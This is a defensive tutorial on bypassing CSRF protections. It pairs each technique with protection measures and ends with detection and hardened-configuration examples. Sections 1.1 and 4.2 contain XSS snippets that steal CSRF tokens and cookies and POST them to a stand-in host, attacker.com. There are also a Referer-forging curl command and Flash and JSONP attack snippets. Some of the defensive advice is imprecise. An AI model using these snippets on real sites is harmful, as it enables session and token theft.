CSRF attack bypass techniques are areas that security researchers and attackers constantly explore. Understanding these techniques helps to better design and implement protection measures.
Common CSRF Protection Bypass Techniques
1. Bypassing CSRF Token Verification
1.1 Token Leakage
// Stealing CSRF Token through XSS <script> // Get CSRF Token from page const token = document.querySelector('input[name="csrf_token"]').value; // Send to attacker's server fetch('https://attacker.com/steal', { method: 'POST', body: JSON.stringify({ csrf_token: token }) }); </script>
Protection Measures:
- Implement HttpOnly Cookie
- Use Content Security Policy (CSP)
- Encrypt and sign Token
1.2 Token Prediction
// Weak random number generator leads to predictable Token function weakCSRFToken() { // Using timestamp as random source return Date.now().toString(36); } // Attacker can predict next Token const predictedToken = (Date.now() + 1000).toString(36);
Protection Measures:
- Use cryptographically secure random number generators
- Token length at least 128 bits
- Include user session information
2. Bypassing SameSite Cookie
2.1 SameSite=None Abuse
// Server incorrectly sets SameSite=None res.cookie('sessionId', sessionId, { sameSite: 'none', secure: false // Missing secure attribute }); // Attacker can exploit this vulnerability to launch CSRF attack
Protection Measures:
- SameSite=None must be used with secure=true
- Use HTTPS
- Avoid unnecessary SameSite=None
2.2 Browser Compatibility Issues
// Check if browser supports SameSite function checkSameSiteSupport() { const testCookie = 'test=1; SameSite=Strict'; document.cookie = testCookie; return document.cookie.includes('test'); } // Legacy browsers don't support SameSite, need other protection measures if (!checkSameSiteSupport()) { // Use CSRF Token and other protection measures }
3. Bypassing Referer Verification
3.1 Referer Header Forgery
# Use curl to forge Referer header curl -X POST https://target-site.com/api/submit \ -H "Referer: https://target-site.com/" \ -d "data=test"
Protection Measures:
- Referer verification only as auxiliary measure
- Use in combination with CSRF Token
- Verify Origin header
3.2 Missing Referer Header
// Referer header may be empty in some cases const scenarios = [ 'HTTPS to HTTP requests', 'Privacy plugins block Referer', 'Direct URL input', 'Bookmark access' ]; // Server should handle these cases correctly
4. Bypassing Double Submit Cookie
4.1 Subdomain Attack
// If Cookie is set on parent domain res.cookie('csrfToken', token, { domain: '.example.com' // Includes all subdomains }); // When subdomain has XSS vulnerability, Token can be stolen // Malicious script on evil.example.com can read Cookie
Protection Measures:
- Avoid setting sensitive Cookies on parent domain
- Use stricter domain settings
- Subdomain isolation
4.2 Cookie Theft
// Steal Cookie through XSS <script> const cookies = document.cookie; fetch('https://attacker.com/steal', { method: 'POST', body: JSON.stringify({ cookies }) }); </script>
Protection Measures:
- Use HttpOnly Cookie
- Implement CSP
- Regularly update Token
5. Advanced Bypass Techniques
5.1 Flash CSRF
// Flash can bypass certain browser security restrictions // Even with SameSite=Strict set var request:URLRequest = new URLRequest("https://target-site.com/api/submit"); request.method = URLRequestMethod.POST; var variables:URLVariables = new URLVariables(); variables.data = "test"; request.data = variables; navigateToURL(request, "_self");
Protection Measures:
- Disable Flash
- Use X-Frame-Options
- Implement CSP
5.2 JSONP CSRF
// Use JSONP endpoint to launch CSRF attack <script> function callback(data) { // Malicious code console.log(data); } </script> <script src="https://target-site.com/api/jsonp?callback=callback"></script>
Protection Measures:
- Avoid using JSONP
- Use CORS instead of JSONP
- Verify request origin
5.3 DNS Rebinding
// DNS Rebinding can bypass same-origin policy // Attacker controls DNS server, making domain resolve to different IPs at different times // 1. First resolve to attacker's server // 2. Second resolve to target server // 3. Bypass same-origin policy restrictions
Protection Measures:
- Use HTTPS
- Verify Host header
- Implement DNSSEC
6. Detection of Protection Bypass
// Detect possible bypass attempts function detectBypassAttempts(req) { const suspicious = { // Detect unusual User-Agent unusualUserAgent: /bot|crawler|spider/i.test(req.headers['user-agent']), // Detect POST requests without Referer missingReferer: req.method === 'POST' && !req.headers.referer, // Detect abnormal request frequency rapidRequests: checkRequestFrequency(req.ip), // Detect suspicious Origin suspiciousOrigin: req.headers.origin && !isTrustedOrigin(req.headers.origin) }; return suspicious; }
Protection Best Practices
1. Multi-layer Protection
// Implement multi-layer protection measures function comprehensiveCSRFProtection(req, res, next) { // Layer 1: SameSite Cookie if (!validateSameSite(req)) { return res.status(403).send('Invalid SameSite'); } // Layer 2: CSRF Token if (!validateCSRFToken(req)) { return res.status(403).send('Invalid CSRF Token'); } // Layer 3: Referer verification if (!validateReferer(req)) { return res.status(403).send('Invalid Referer'); } // Layer 4: Origin verification if (!validateOrigin(req)) { return res.status(403).send('Invalid Origin'); } next(); }
2. Security Configuration
// Secure Cookie configuration res.cookie('sessionId', sessionId, { httpOnly: true, // Prevent XSS theft secure: true, // HTTPS only sameSite: 'strict', // Strictest CSRF protection domain: 'example.com', // Specific domain, not parent domain path: '/', // Restrict path maxAge: 3600000 // Reasonable expiration time });
3. Regular Security Audits
// Security audit checklist const securityAudit = { csrfToken: { isRandom: true, isLongEnough: true, hasExpiration: true, isEncrypted: false }, cookieSettings: { httpOnly: true, secure: true, sameSite: 'strict' }, validation: { refererCheck: true, originCheck: true, tokenValidation: true } };
Understanding CSRF attack bypass techniques helps design stronger protection measures, but it's important to remember that security is an ongoing process that requires constant updating and improvement of protection strategies.